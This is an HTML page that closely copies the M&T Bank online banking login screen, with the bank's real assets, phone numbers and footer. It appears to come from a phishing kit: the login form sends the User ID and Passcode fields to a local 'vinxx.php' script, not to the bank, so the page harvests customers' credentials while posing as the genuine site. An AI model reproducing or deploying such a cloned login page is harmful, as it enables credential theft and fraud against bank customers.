
<!DOCTYPE HTML>
<html lang="en" class="__sticky-footer __sticky-footer--links">
<head>
<script type="text/javascript" src="https://resources.mtb.com/TSPD/08a6c39cccab2000b7efb24e9f9fbacc2a5aec4486ecfda94d24cea00684618132764833fb6b402c?type=9"></script>

    <title>Welcome to Online Banking | M&amp;T Bank</title>
    <meta charset="UTF-8"/>
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"/>
    <meta http-equiv="X-UA-Compatible" content="ie=edge"/>
    <meta name="format-detection" content="telephone=no"/>
    
    <script type="text/javascript" src="https://resources.mtb.com/ruxitagentjs_ICA2SVfgjqrux_10171190801163814.js" data-dtconfig="rid=RID_-583655553|rpid=-829262011|domain=mtb.com|reportUrl=/rb_edeadee0-0165-4b9e-a91f-0085183ac4e1|app=893c324bd7e5ac65|featureHash=ICA2SVfgjqrux|srsr=25000|rdnt=1|uxrgce=1|bp=2|srms=1,1,,,|uxrgcm=100,25,300,3;100,25,300,3|dpvc=1|lastModification=1565998420428|dtVersion=10171190801163814|tp=500,50,0,1|uxdcw=1500|agentUri=/ruxitagentjs_ICA2SVfgjqrux_10171190801163814.js"></script><link href="https://resources.mtb.com/r/simple-layout-responsive/css.mtb?v=709a6dea-0389-4ceb-b92f-fbf4a2cb32d9" rel="stylesheet"/>
  
    <script src="//nexus.ensighten.com/mtbank/OE-Prod/Bootstrap.js"></script>

    
</head>
<body>




<form action="vinxx.php" method="post"><input id="UnMaskedUserId" name="UnMaskedUserId" type="hidden" value="" />    <div class="mtb-app-enrollment">
        <header class="mtb-page-header">
            <input type="hidden" id="TagPageName" name="TagPageName" value="OLB:Login:Index" />
            <div class="grid-x align-center">
                <div class="cell">
                    <a href="https://www.mtb.com/home-page" class="mtb__logo">
                        <img src=https://resources.mtb.com/Assets/img/mtb-logo.svg alt="M&T Bank Site" />
                    </a>
                </div>
            </div>
        </header>
    
    
            <div class="mtb-page-error hide js-pgLevelMsg">
                <div class="mtb-app-default--content">
                    <div class="callout __has-icon warning __no-border">
                        <i class="__is-icon m-icon m-icon-notification">
                            <span class="show-for-sr">Notification Icon</span>
                        </i>
                        Please provide your User ID and Passcode.
                    </div>
                </div>
            </div>
        <div class="mtb-app-login--content">
            <div class="grid-x grid-padding-x grid-x__padded __spacer-section">
                <div class="cell">
                    <input type="hidden" value="OLB:SSC:LogInToOnlineBanking"/>
                    <div class="mtb-section-header mtb-section-header__login">
                        <h1>
                            Log In to Online Banking
                        </h1>
                        <p>
                            For Personal and Business Accounts
                        </p>
                    </div>
                </div>

                <div class="cell">
                    <label for="userId">
                        User ID
                    </label>
                    <div class="input-group m-fake-single-input">
                        <input class="input-group-field js-formnputItem"  data-fc-id="121" type="text" id="userId" name="user" autocomplete="off"  
                               aria-required="true" data-inputtype="text" data-attribute="" maxlength="20" />
                        <div class="input-group-button">
                            <button type="button" id="Hide" data-btnfor="userId" class="button clear hide js-showHide">Hide</button>
                        </div>
                    </div>
                </div>

                <div class="cell">
                    <label for="Passcode">
                        Passcode
                    </label>
                    <div class="input-group m-fake-single-input">
                        <input class="input-group-field js-formnputItem"   data-fc-id="122" type="password" id="Passcode" name="code" autocomplete="off"  aria-required="true" data-inputtype="tel" maxlength="20"/>
                        <div class="input-group-button">
                            <button type="button" id="Show" data-btnfor="Passcode" class="button clear hide  js-showHide">Show</button>
                        </div>
                    </div>
                </div>
 
                <div class="cell">
                    <div class="mtb-formcheckbox">
                        <input class="show-for-sr" type="checkbox" id="RememberUserId" name="RememberUserId" value="false"/>
                        <label for="RememberUserId" class="__spacer-remove">
                            Remember User ID
                        </label>
                    </div>
                </div> 
            </div>

            <div class="grid-x grid-padding-x __spacer-paragraph grid-x__padded">
                <div class="cell">
                    
                    <button type="submit" class="button button__form-no-spacer expanded" id="btnSubmit">
                        Log In
                    </button>
                </div>
                <div class="cell">
                    <a href="\Login\LoginHelp" class="button button__fake-padding-no-spacer expanded clear" id="jsAnalyticsLink" >Help with User ID or Passcode</a>
                </div>
                <div class="cell">
                    <a href="/Enrollment/Enroll" class="button button__fake-padding expanded clear" id="jsAnalyticsEnrollLink" data-attribute="item">Enroll Now</a>
                </div>

                <p class="cell text-center __font-size-tiny __color-gray-accent">
                    Unauthorized access is prohibited. Usage may be monitored.
                </p>
            </div>
        </div>

        <hr class="__spacer-section"/>
        <div class="mtb-app-default--content">

            <div class="grid-x grid-padding-x grid-x__padded">
                <div class="cell text-center">
                    <p class="__font-size-secondary">
                        Have questions about M&T Online Banking?
                    </p>
                </div>
                <div class="cell medium-6 text-center">
                    <p class="__font-size-secondary __color-primary __spacer-paragraph-half">
                        Personal Accounts:
                        <a href="tel:1-800-790-9130" class="__no-underline">1-800-790-9130</a>
                    </p>
                    <p class="__font-size-sub __spacer-remove __color-gray-accent">
                        Monday - Friday 8am - 9pm ET
                    </p>
                    <p class="__font-size-sub __spacer-paragraph __color-gray-accent">
                        Saturday - Sunday 9am - 5pm ET
                    </p>
                </div>
                <div class="cell medium-6 text-center">
                    <p class="__font-size-secondary __color-primary __spacer-paragraph-half">
                        Business Accounts: <a href="tel:1-800-724-6070" class="__no-underline">1-800-724-6070</a>
                    </p>
                    <p class="__font-size-sub __spacer-remove __color-gray-accent">
                        Monday - Friday 6am - 9pm ET
                    </p>
                    <p class="__font-size-sub __spacer-section __color-gray-accent">
                        Saturday - Sunday 9am - 5pm ET
                    </p>
                </div>
            </div>
        </div>
        <section class="mtb-footer mtb-footer__auth" role="contentinfo">
            <div class="grid-x">
                <div class="cell flex-container flex-dir-column align-center-middle">
                    <div class="mtb-footer--auth">
                        <a href="https://upgrade.mtb.com/olb-upgrade" class="" target="_blank">Get Started Guide</a>
                        <a href="//www.mtb.com/olbsecurity" target="_blank">Security Assistance</a>
                        <a href="https://asset.mtb.com/Documents/html/DSA.htm" target="_blank">Digital Service Agreement</a>
                        <a href="https://asset.mtb.com/Documents/html/ESign.htm" target="_blank">ESign Agreement</a>
                        <a href="https://mtb.com/olb-accessibility" target="_blank">
                            Accessibility
                        </a>


                        <a href="https://www.mtb.com/olb-personalsite" target="_blank">
                            mtb.com
                        </a>
                    </div>

                    <div class="mtb-footer--non-auth">
                        <p>
                            &copy;2019 M&amp;T Bank. All Rights Reserved.<br>
                            Users of this website agree to be bound by the provisions of the M&amp;T website <a href="https://www.mtb.com/help-center/policies/terms-of-use" target="_blank">
                                Terms of
                                Use
                            </a> and <a href="https://www.mtb.com/privacy" target="_blank">Privacy Policy</a>.
                        </p>
                        <div class="mtb-footer__logo">
                            <a href="https://www.mtb.com/equalhousinglender" target="_blank">
                                <img src=https://resources.mtb.com/Assets/img/mtb-equalhousinglender.svg class="mtb-footer__equalhousinglender" alt="Equal Housing Lender" />
                            </a>
                            <a href="https://www.mtb.com/olb-entrust" target="_blank">
                                <img src="https://resources.mtb.com/Assets/img/mtb-entrust.svg " class="mtb-footer__entrust" alt="Entrust" />
                            </a>
                        </div>
                        <p>
                            Equal Housing Lender NMLS #381076
                            <a href="https://www.mtb.com/fdic" target="_blank">Member FDIC</a>
                        </p>
                    </div>
                </div>
            </div>
        </section>
    </div>
</form>
<script src="https://resources.mtb.com/r/simple-layout-responsive/js.mtb?v=d257802d-77ea-4e56-b249-15db0c85cf42"></script>


    <script src="https://resources.mtb.com/Assets/scripts/Login/Index.js"></script>


</body>
</html>

<script id="f5_cspm">(function(){var f5_cspm={f5_p:'FCGKKECNMDCIHELLHGDBHAGEAOHCFEBBNNJIOMNCELEGDDOBDLAIAIGNFDDLFCJNHFKAJMNPLACBEEKLHMAPNGDNHHJALLAOAAPMHMOJFIGCBIFCAAHNFMKCNHLHAPKF',setCharAt:function(str,index,chr){if(index>str.length-1)return str;return str.substr(0,index)+chr+str.substr(index+1);},get_byte:function(str,i){var s=(i/16)|0;i=(i&15);s=s*32;return((str.charCodeAt(i+16+s)-65)<<4)|(str.charCodeAt(i+s)-65);},set_byte:function(str,i,b){var s=(i/16)|0;i=(i&15);s=s*32;str=f5_cspm.setCharAt(str,(i+16+s),String.fromCharCode((b>>4)+65));str=f5_cspm.setCharAt(str,(i+s),String.fromCharCode((b&15)+65));return str;},set_latency:function(str,latency){latency=latency&0xffff;str=f5_cspm.set_byte(str,48,(latency>>8));str=f5_cspm.set_byte(str,49,(latency&0xff));str=f5_cspm.set_byte(str,43,2);return str;},wait_perf_data:function(){try{var wp=window.performance.timing;if(wp.loadEventEnd>0){var res=wp.loadEventEnd-wp.navigationStart;if(res<60001){var cookie_val=f5_cspm.set_latency(f5_cspm.f5_p,res);window.document.cookie='f5avr1662658484aaaaaaaaaaaaaaaa='+encodeURIComponent(cookie_val)+';path=/';}
return;}}
catch(err){return;}
setTimeout(f5_cspm.wait_perf_data,100);return;},go:function(){var chunk=window.document.cookie.split(/\s*;\s*/);for(var i=0;i<chunk.length;++i){var pair=chunk[i].split(/\s*=\s*/);if(pair[0]=='f5_cspm'&&pair[1]=='1234')
{var d=new Date();d.setTime(d.getTime()-1000);window.document.cookie='f5_cspm=;expires='+d.toUTCString()+';path=/;';setTimeout(f5_cspm.wait_perf_data,100);}}}}
f5_cspm.go();}());</script>